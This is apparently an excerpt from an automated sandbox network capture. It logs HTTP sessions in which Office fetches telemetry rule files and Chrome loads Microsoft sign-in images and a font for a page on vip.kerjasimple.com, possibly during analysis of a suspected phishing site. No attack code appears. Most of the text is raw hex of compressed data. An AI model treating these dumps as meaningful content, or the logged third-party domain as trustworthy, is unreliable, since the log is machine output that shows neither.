                                                        2024-11-12 15:27:04 UTC4233INData Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 4f 4d 49 4e 47 20 53 4f 4f 4e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 67 69 6d 67 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 43 4f 4d 49 4e 47 20 53 4f 4f 4e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 64 65 6d 6f 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 22 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 62 6f 64 79 2c 0a 20 20 20 20 20 20 68 74 6d
                                                        Data Ascii: <html> <head> <title>COMING SOON</title> <body> <div class="bgimg"> <div class="middle"> <h1>COMING SOON</h1> <hr> <p id="demo" style="font-size:30px"></p> </div> </div> <style> body, htm


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.64975713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:04 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 472
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                        ETag: "0x8DC582B9DACDF62"
                                                        x-ms-request-id: 764b7f95-c01e-00a1-1c00-2d7e4a000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152704Z-16547b76f7fkj7j4hC1DFW0a9g0000000ftg00000000c6mb
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:04 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.64975613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:04 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 419
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                        ETag: "0x8DC582B9748630E"
                                                        x-ms-request-id: 5dc315bb-301e-0096-66a5-34e71d000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152704Z-15869dbbcc6j87jfhC1DFWr0yc000000082000000000c6tv
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        38192.168.2.64975813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:04 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 404
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                        ETag: "0x8DC582B9E8EE0F3"
                                                        x-ms-request-id: f62a067a-a01e-0053-41a7-348603000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152704Z-17df447cdb5vq4m4hC1DFW2t8w00000001d000000000ffas
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:04 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        39192.168.2.64975913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:04 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 468
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                        ETag: "0x8DC582B9C8E04C8"
                                                        x-ms-request-id: 1e45a1cf-401e-0029-3ef1-2c9b43000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152704Z-16547b76f7fvllnfhC1DFWxkg80000000frg00000000p998
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:04 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        40192.168.2.64974713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:04 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 494
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                        ETag: "0x8DC582BB7010D66"
                                                        x-ms-request-id: a295cb8f-e01e-003c-1ba3-34c70b000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152704Z-15869dbbcc6khw88hC1DFWbb2000000009p000000000akvm
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:04 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.64976213.107.246.454436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                        Host: logincdn.msauth.net
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:05 UTC806INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 276
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                        ETag: 0x8D79ED35591CF44
                                                        x-ms-request-id: 799db843-101e-0016-2de1-340a2c000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241112T152705Z-17df447cdb5wrr5fhC1DFWte8n0000000cu0000000000d9d
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L2_T2
                                                        X-Cache: TCP_REMOTE_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:05 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                        Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.64976113.107.246.454436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                        Host: aadcdn.msauth.net
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:05 UTC785INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 1435
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                        ETag: 0x8DB5C3F4911527F
                                                        x-ms-request-id: 137f3aa9-001e-0073-10e3-32ec7a000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241112T152705Z-17df447cdb5l865xhC1DFW9n7g00000008zg00000000cx4n
                                                        x-fd-int-roxy-purgeid: 4554691
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:05 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                        Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.649771104.17.25.144436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC656OUTGET /ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                        Host: cdnjs.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://vip.kerjasimple.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:05 UTC975INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: application/octet-stream; charset=utf-8
                                                        Content-Length: 154228
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=30672000
                                                        ETag: "623a082a-25a74"
                                                        Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                        cf-cdnjs-via: cfworker/kv
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Timing-Allow-Origin: *
                                                        X-Content-Type-Options: nosniff
                                                        CF-Cache-Status: HIT
                                                        Age: 521858
                                                        Expires: Sun, 02 Nov 2025 15:27:05 GMT
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOq7ukEEqp2WD5wbuawd3kRzdIRzwkEUfGnfJukumazEBWCv9cUIW5x%2BDq4JaLVtYCL0pfucZecQfi9%2FBA0SttnpQtLUUKyrAc1F7pq5rK1PsAxmMRcVP6m4WVuo9pbnjkCCzxnH"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                        Strict-Transport-Security: max-age=15780000
                                                        Server: cloudflare
                                                        CF-RAY: 8e178b4c8c97eaac-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-11-12 15:27:05 UTC394INData Raw: 77 4f 46 32 00 01 00 00 00 02 5a 74 00 0a 00 00 00 05 a0 28 00 02 5a 29 03 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 ab 28 00 81 8f 40 ca 94 d0 28 cb ab 2c 05 87 70 07 20 a5 13 d0 92 94 01 48 70 1e 00 00 b6 ea e7 61 44 8a 66 0f 4f 11 b0 71 00 00 e8 9a 07 40 55 55 55 55 d5 a4 84 80 c7 6c db 01 a8 aa aa e0 47 3f f9 d9 2f 7e f5 9b df fd e1 4f 7f f9 9b bf fb 87 7f fa 97 7f fb 8f ff fa 9f ff fb 4f 81 c1 b8 fb 07 c2 b4 6c c7 e5 f6 78 7d 7e c3 7f b5 df e7 b9 3d ef 03 ed 4e 88 27 c0 8e b8 a3 c2 0a 88 ca 47 75 40 af 8c 70 31 86 47 a8 08 19 e3 d6 66 2c cc a5 2a 10 cb 56 3c 5b 00 c4 57 08 e1 55 a6 57 23 f9 e4 02 90 13 e0 40 9e 82 ab ed f0 22 5b c9 44 f4 38 98 89 ca 8b 0b 4c b4 ed 37 49 a7 07 f5 bc 7f e0 4f a4 7b
                                                        Data Ascii: wOF2Zt(Z)8$ `(@(,p HpaDfOq@UUUUlG?/~OOlx}~=N'Gu@p1Gf,*V<[WUW#@"[D8L7IO{
                                                        2024-11-12 15:27:05 UTC1369INData Raw: af fb 41 37 0f ec 60 ef 74 2f 49 3b b0 33 2d 4b 96 76 64 4b b1 ec 18 d6 44 d1 84 6d 85 64 73 d0 e3 f8 12 db 41 85 d0 1b 62 85 d0 e3 23 d4 3f 1f c1 da 47 e4 4f ce 6d 2e 99 3d 9e ac 9c ff ea 75 78 fd 3a bc d7 9d 67 72 cf f4 cc f4 cc a6 09 bd 33 bd e1 f6 76 2e af 74 0a 7b a7 70 a7 78 a3 90 40 48 0b 02 24 04 42 23 a2 48 d6 01 06 04 18 34 72 42 02 3e 9c 13 c6 09 8d b0 fd 1d d2 19 27 1c b5 38 e2 84 0f 07 c0 81 be 9f 70 6a fd 3c d1 68 34 1a a1 67 e4 d8 71 2c 59 b6 e4 c4 4e 62 5b b6 95 b0 bb c0 6d 73 c4 5e 4c f7 30 dd ed 02 5d 7d c7 dd a3 dc c7 7e f6 27 ce 11 fb 13 77 3f 61 3e 10 39 3f cf cf d4 fe 9d 0b f4 de bb 0f 48 c0 4f d2 93 66 46 23 69 34 92 c6 9e 19 8f 4c b1 1d 3b 89 9d 34 71 a8 c9 04 37 61 a7 6d c2 6d a6 94 c2 52 da 85 94 33 05 5c f2 76 81 9b c9 62 cb ee
                                                        Data Ascii: A7`t/I;3-KvdKDmdsAb#?GOm.=ux:gr3v.t{px@H$B#H4rB>'8pj<h4gq,YNb[ms^L0]}~'w?a>9?HOfF#i4L;4q7ammR3\vb
                                                        2024-11-12 15:27:05 UTC1369INData Raw: e2 c9 d5 dc 28 56 bd 3c 5b 33 aa d5 ba 94 f6 2e ee 34 2a b9 77 b9 b3 5a 57 25 53 ec 90 d4 76 29 0c 73 a9 ca b3 f3 ce 2a f9 34 68 fc b5 0c c4 93 18 1b 5a ea 47 27 ab ee 6c 63 c7 de 95 cd d9 89 a9 b2 9c 94 b3 81 9c 37 02 76 4f 35 e6 30 1a 3f 8e 51 e4 82 f7 af cb 01 83 c5 bd f7 2b d5 de 34 ec 6e db 43 05 a3 d1 dd f9 d0 e1 f0 3c d1 6f 44 91 bb ce 26 2d 6d 95 c7 cb 14 89 03 c1 d3 81 8c 7a a0 87 c5 b8 72 f3 7b d4 c8 5c c8 b8 21 ef 3b 87 d5 ea a2 75 94 58 8a f8 e7 29 de 8b f6 d2 79 90 a8 66 dd 3a 30 18 d6 a0 2b 9d 21 cf e1 eb 90 7f ba b8 7d 1c 45 f1 36 22 b7 e9 90 d5 2e 9d 8f 32 bf c3 fa ca 67 ab 18 d4 cb 91 bd ed fa b4 f4 07 cc 93 b5 22 a7 2d ae 05 87 f4 1d df c6 63 19 97 f8 48 c7 a8 bf d3 90 65 e2 c9 9c 8d 6f cd 06 0f f7 90 38 b0 73 ef 5f 14 cc 5b cc 97 1a 96
                                                        Data Ascii: (V<[3.4*wZW%Sv)s*4hZG'lc7vO50?Q+4nC<oD&-mzr{\!;uX)yf:0+!}E6".2g"-cHeo8s_[
                                                        2024-11-12 15:27:05 UTC1369INData Raw: 33 26 63 31 21 13 31 31 93 33 05 d3 30 2d d3 31 3d 33 33 17 f3 b3 30 4b b3 0c 2b b3 26 6b b1 1e 1b b3 15 fb 72 04 c7 72 32 a7 72 06 67 71 36 e7 70 1e 17 71 33 b7 72 1b 77 f0 00 cf f1 32 ef f2 1e ef f3 01 1f f3 35 3f f2 1b bf f3 27 7f f1 9f 02 15 46 11 94 58 99 94 5b f9 54 4e e5 55 59 55 d5 48 1d d5 47 7d d5 5f 03 34 42 13 34 51 93 34 59 d3 34 5d b3 34 5f 0b b5 58 2b b5 56 bb b5 47 fb b4 5f 07 74 50 87 74 58 47 75 5c 27 74 59 37 74 53 0f f5 4a 6f f4 5e 9f 24 7d d3 4f fd b3 50 16 d1 12 5a 62 4b 6b d9 2d af 35 b0 46 d6 d4 5a d8 30 1b 6e 63 6c aa ad b2 23 76 cc 4e d9 39 bb 62 d7 ec 91 3d b5 57 f6 c9 7e db 5f fb ef a1 3d aa 27 f7 94 9e d3 73 7b 7e 2f e8 45 bc 98 97 f0 52 5e c6 2b 78 65 af ea 35 bc ae 37 f2 26 de dc 5b 7b 27 ef ee 3d bd 9f 0f f2 21 3e dc c7 f8
